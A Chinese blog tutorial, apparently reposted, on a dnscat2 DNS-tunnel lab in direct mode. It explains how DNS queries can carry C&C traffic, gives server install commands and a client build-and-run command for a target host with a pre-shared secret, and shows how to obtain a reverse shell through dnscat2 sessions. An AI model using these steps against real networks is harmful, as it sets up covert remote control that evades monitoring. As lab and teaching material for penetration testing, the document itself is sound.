网络安全内网渗透之DNS隧道实验--dnscat2直连模式

这篇具有很好参考价值的文章主要介绍了网络安全内网渗透之DNS隧道实验--dnscat2直连模式。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、DNS隧道攻击原理

二、DNS隧道工具

(一)安装dnscat2服务端

(二)启动服务器端

(三)在目标机器上安装客户端

(四)反弹shell


一、DNS隧道攻击原理

        在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。从DNS协议的角度看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上不是--返回的可以是任意字符串,包括加密的C&C指令。

二、DNS隧道工具

        Dnscat2是一款开源软件,它使用DNS协议创建加密的C&C通信,通过预共享密钥进行身份验证;使用shell及DNS查询类型(A、AAAA、TXT、CNAME、MX),多个同时进行的会话类似SSH中的隧道。Dnscat2的客户端使用C语言编写的,服务端是用Ruby语言编写的。

        使用dnscat2隧道的模式有两种,分别是直连模式和中继模式。

        直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求;

        中继模式:DNS经过互联网的迭代解析,指向指定的DNS服务器。与直连模式相比,中继模式的速度较慢。

        如果内网放行所有的DNS请求,dnscat2会使用直连模式,通过UDP的53端口进行通信(不需要域名,速度快,而且看上去仍然像普通的DNS查询)。在请求日志中,所有的域名都是以“dnscat”开头的,因此防火墙可以很容易地将直连模式的通信检测出来。

        如果内网中的请求仅限于白名单服务器或者特定的域,dnscat2会使用中继模式来申请一个域名,并将运行dnscat2服务端的服务器指定为受信任的DNS服务器。

        本章实验以直连模式为测试模式。

(一)安装dnscat2服务端

        dnscat2使用ubuntu系统,安装命令如下:

​
apt-get install -y gem

apt-get install -y ruby-dev(注意安装的时候系统崩了,重启后使用命令dpkg --configure -a)

apt-get install -y libpq-dev

apt-get install -y ruby-bundler

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server

bundle install

(二)启动服务器端

ruby dnscat2.rb

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全

(三)在目标机器上安装客户端

​git clone https://github.com/iagox86/dnscat2.git

        不能在线git clone的话,使用其他方式上传到目标主机。

cd dnscat2/client/

make

./dnscat --dns server=192.168.101.105,port=53 --secret=9fb91ae03a857d46bd2c9b19ea9ef13a

        结果如下:

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全

        服务端结果如下:

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全

(四)反弹shell

        使用windows查看可以连接的会话

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全

        window -i 1连接到会话1

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全

        help查看命令

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全

        shell命令执行后,创建window 4

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全

        使用window -i 4进入交互会话,ifconfig可以看到被控主机的IP是192.168.101.106,也就是dnscat客户端主机的IP地址

网络安全内网渗透之DNS隧道实验--dnscat2直连模式,网络安全,web安全,安全文章来源地址https://www.toymoban.com/news/detail-735426.html

到了这里,关于网络安全内网渗透之DNS隧道实验--dnscat2直连模式的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全渗透测试实验一

    理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);

    2023年04月26日
    浏览(51)
  • 网络安全内网渗透之信息收集--systeminfo查看电脑有无加域

    systeminfo输出的内容很多,包括主机名、OS名称、OS版本、域信息、打的补丁程序等。 其中,查看电脑有无加域可以快速搜索: 输出结果为WORKGROUP,可见该机器没有加域: systeminfo的所有信息如下: C:UsersAdministratorsysteminfo 主机名:           USER-20210123NC OS 名称:          M

    2024年02月07日
    浏览(60)
  • 【HUST】网安|计算机网络安全实验|实验二 DNS协议漏洞利用实验

    写在最前: 这是我个人的实验记录,实现方式有很多种,多台虚拟机更容易做netwox。 认真整理和记录了一下容易出问题的地方。 代码仓库开了。 HUST计算机网络安全实验_Gitee Github docker使用 建立实验环境 普通用户: seed 密码:dees 超级用户:root 密码:seedubuntu Network(bridge):

    2024年02月04日
    浏览(49)
  • 【网络安全知识体系】外网渗透测试 | 14个小实验

     写在前面:视频地址 成功上岸360!0基础网络安全 入行 到 入yu、漏洞挖掘-外网渗透测试流程 目录 一、导读: 二、汇总: 三、知识导图 四、面试常见问题 五、渗透测试流程 1、简述: 2、寻找测试目标 3、信息收集 3、漏洞挖掘 4、漏洞利用获得webshell 探索技术的尖端——

    2023年04月21日
    浏览(46)
  • 【内网安全】搭建网络拓扑,CS内网横向移动实验

    实验拓扑结构如下: **攻击者win10地址:**192.168.8.3 dmz win7地址: 10.9.75.49 172.16.1.1 **DC server2008地址:**172.16.1.254 CS服务器 kali: 10.9.75.171 1、搭建CS服务器,CS客户端连接 攻击者充当CS客户端连接 开启监听 生成木马 攻击者win10 攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连

    2024年02月03日
    浏览(45)
  • 内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

    内网安全-隧道技术SSH实现通信DNS上线与通信CS上线Linux主机 一、DNS隧道技术 DNS简介:DNS协议为应用层协议,区域传输时用tcp协议,域名解析时用udp协议 ###通过DNS隧道绕过防火墙,实现CS上线 实验背景:靶机防火墙封禁出站TCP协议 1、判断出网协议,若果可以ping通,可以利用

    2024年02月02日
    浏览(52)
  • 第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

    知识点 演示案例

    2024年02月14日
    浏览(64)
  • 网络安全 Day28-运维安全项目-加密隧道

    两点如何传输数据最安全 方案1: 专线(成本高) 方案2: 硬件设备3层路由器 , 硬件vpn设备 vpn virtual private network 虚拟专有网络 深信服VPN 方案3: 开源软件 pptp (不推荐) 使用最简单,不是很稳定,依赖于 网络设备 的支持. OpenVPN 实现用户/运维/开发,访问网站内网. 运营:通过OpenVPN实现网

    2024年02月13日
    浏览(40)
  • 网络协议 — IPSec 安全隧道协议族

    2024年02月06日
    浏览(60)
  • 内网渗透—隧道技术

      在进行渗透测试以及攻防演练的时候,通常会存在各种边界设备、软硬件防火墙、IPS等设备来检测外部连接情况,这些设备如果发现异常,就会对通信进行阻断。   那么隧道技术就是一种绕过端口屏蔽的通信方式,在实际情况中防火墙上会设定各种安全策略,比如允许

    2024年02月08日
    浏览(51)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包